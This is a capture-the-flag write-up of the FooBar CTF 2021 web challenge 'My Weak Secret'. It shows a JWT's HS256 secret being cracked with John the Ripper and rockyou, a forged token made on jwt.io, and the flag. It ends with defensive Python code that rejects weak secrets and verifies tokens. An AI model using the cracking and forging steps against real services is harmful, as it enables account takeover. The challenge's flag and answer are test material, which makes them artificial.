FooBar CTF 2021: My Weak Secret

My Weak Secret

Category: Web

100 points

Never use weak secrets. I repeat NEVER.

http://chall.nitdgplug.org:30299

Solution

The challenge description hints that a weak password has been used, so I used John the Ripper to try a brute-force attack.

First, I saved the JWT to a file (you can try it yourself; here it is: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiZXJyb3IifQ.XALcPJYbkoM2OvMjOrFCBb5w4CuYSavfjgCL_RHymjU).

Second, I launched Johnny.

john --wordlist=/home/luc/Pobrane/rockyou.txt --format=HMAC-SHA256 jwt.txt
Using default input encoding: UTF-8
Loaded 1 password hash (HMAC-SHA256 [password is key, SHA256 256/256 AVX2 8x])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
badboy           (?)
1g 0:00:00:00 DONE (2021-04-01 17:05) 50.00g/s 819200p/s 819200c/s 819200C/s 123456..christal
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

Then I forged a new JWT with https://jwt.io.

Then I swapped the JWT cookie and got the reward.

Flag

GLUG{us3_5tr0ng_jw7_s3cr37}
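
The defensive side of this challenge, as an added example that is not part of the original writeup or the challenge's code: a check that rejects an HS256 secret such as badboy before it is used, and a verifier that pins the algorithm and compares signatures in constant time. The function names and the three-entry password set are assumptions made for illustration; the 32-byte minimum follows RFC 7518 section 3.2.

```python
import base64, hashlib, hmac, json, secrets

MIN_KEY_BYTES = 32  # RFC 7518 s3.2: an HS256 key must be at least the hash output size
COMMON = {b"123456", b"badboy", b"christal"}  # constructed stand-in for a real wordlist

def b64d(part: str) -> bytes:
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))

def b64e(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def audit_secret(secret: bytes, wordlist=COMMON) -> list:
    """Return reasons the secret is unfit for HS256; an empty list means acceptable."""
    problems = []
    if len(secret) < MIN_KEY_BYTES:
        problems.append(f"{len(secret)} bytes, need at least {MIN_KEY_BYTES}")
    if secret in wordlist:
        problems.append("present in a common-password list")
    return problems

def new_secret() -> bytes:
    """Generate the key from the OS CSPRNG instead of choosing a word."""
    return secrets.token_bytes(MIN_KEY_BYTES)

def _mac(secret: bytes, signing_input: str) -> bytes:
    return hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()

def sign_hs256(claims: dict, secret: bytes) -> str:
    if audit_secret(secret):
        raise ValueError("refusing to sign with a weak secret")
    parts = [b64e(json.dumps(p, separators=(",", ":")).encode())
             for p in ({"alg": "HS256", "typ": "JWT"}, claims)]
    signing_input = ".".join(parts)
    return signing_input + "." + b64e(_mac(secret, signing_input))

def verify_hs256(token: str, secret: bytes) -> dict:
    """Return the claims if the token is HS256 and the MAC matches, else raise ValueError."""
    try:
        h, b, s = token.split(".")
        header, sig = json.loads(b64d(h)), b64d(s)
    except Exception as exc:
        raise ValueError("malformed token") from exc
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        raise ValueError("unexpected alg")
    if not hmac.compare_digest(sig, _mac(secret, h + "." + b)):
        raise ValueError("bad signature")
    return json.loads(b64d(b))
```

Running audit_secret at service startup turns a guessable secret into a deployment failure rather than a token-forgery risk.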

luc © 2021